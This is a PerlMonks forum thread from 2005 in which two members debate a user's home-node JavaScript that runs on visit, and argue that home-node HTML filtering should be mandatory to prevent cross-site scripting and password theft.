Beefy Boxes and Bandwidth Generously Provided by pair Networks
Problems? Is your data what you think it is?
 
PerlMonks  

Re: Has a line been crossed by this user

by g0n (Priest)
on Jul 05, 2005 at 18:15 UTC ( [id://472555]=note: print w/replies, xml ) Need Help??


in reply to Has a line been crossed by this user

I'm in two minds about this. Anyone new to the site may not realise what paranoia mode is for, or be aware that twiddly tricks with javascript are possible on homenodes. I've only seen one or two 'so-and-monk snoops around ctrl-z's homenode' in the CB, so it obviously isn't a major problem, and I know from being embarassed by the first homenode button that I clicked (barts) that it's a reasonably good way of attracting newbies attention to the fact that this sort of thing goes on. ctrl-z's reasonably harmless code might draw attention to this kind of trick and stop people falling for password stealing, XP chopping or vote stealing scripts.

I tend to use javascript only when necessary and don't know it very well, so I can only applaud the experimental spirit that I assume lies behind ctrl-z's script. I spent a couple of hours playing with random phrase selectors for a homenode button and found it an interesting coding problem. Perhaps it is a peacock tail type display, but isn't the monastery somewhere to have fun?

OTOH, it is a bit anti-social to run code immediately on visiting a homenode, and I think sets a bad precedent. I often visit homenodes of people I don't know in response to their remarks in the CB, and wouldn't want the CB to be constantly disrupted by this sort of thing.

On balance, my comment to ctrl-z would probably be "Nice trick, and I for one am suitably impressed by your inventiveness (seriously, I'm not being sarcastic). But please take it down".

--------------------------------------------------------------

g0n, backpropagated monk

  • Comment on Re: Has a line been crossed by this user

Replies are listed 'Best First'.
Re^2: Has a line been crossed by this user (filtering)
by tye (Sage) on Jul 05, 2005 at 19:12 UTC

    Users' home nodes should have filtered HTML (unconditionally) so that much worse cross-site scripting attacks are not possible. I find the site allowing this to be done is a more serious problem than this mildly annoying (the CB postings from buttons have been more annoying so far, in my experience) use of it.

    The (poorly named) "really paranoid" setting in user settings filters home-node HTML much like is already done everywhere else on PerlMonks. This is the only way to eliminate the potential for cross-site scripting attacks, which can be destructive but haven't been yet.

    There are a couple of imperfections in the current implementation of home-node HTML filtering that will eventually be addressed (and will then also prevent a few javascript exploits that are still possible outside of home nodes).

    This filtering just needs to become mandatory. Supporting cross-site scripting attacks just doesn't make sense to me. I'm thankful that demerphq put up home node HTML filtering and I now mostly feel safe visiting home nodes.

    Then we won't have to "deal with" the possibility that one person might register at PerlMonks who is both anti-social and knows a tiny bit of JavaScript, no matter how remote some would like to think this possibility should be. (Not that I have any proof that one or more people haven't already been silently collecting PerlMonks passwords waiting for the right moment to exploit them for some mayhem.)

    - tye        

[reply]

In Section Perl Monks Discussion

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?

www.com | www.net | www.org
Node Status?
node history
Node Type: note [id://472555]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others avoiding work at the Monastery: (3)
As of 2024-04-19 23:32 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found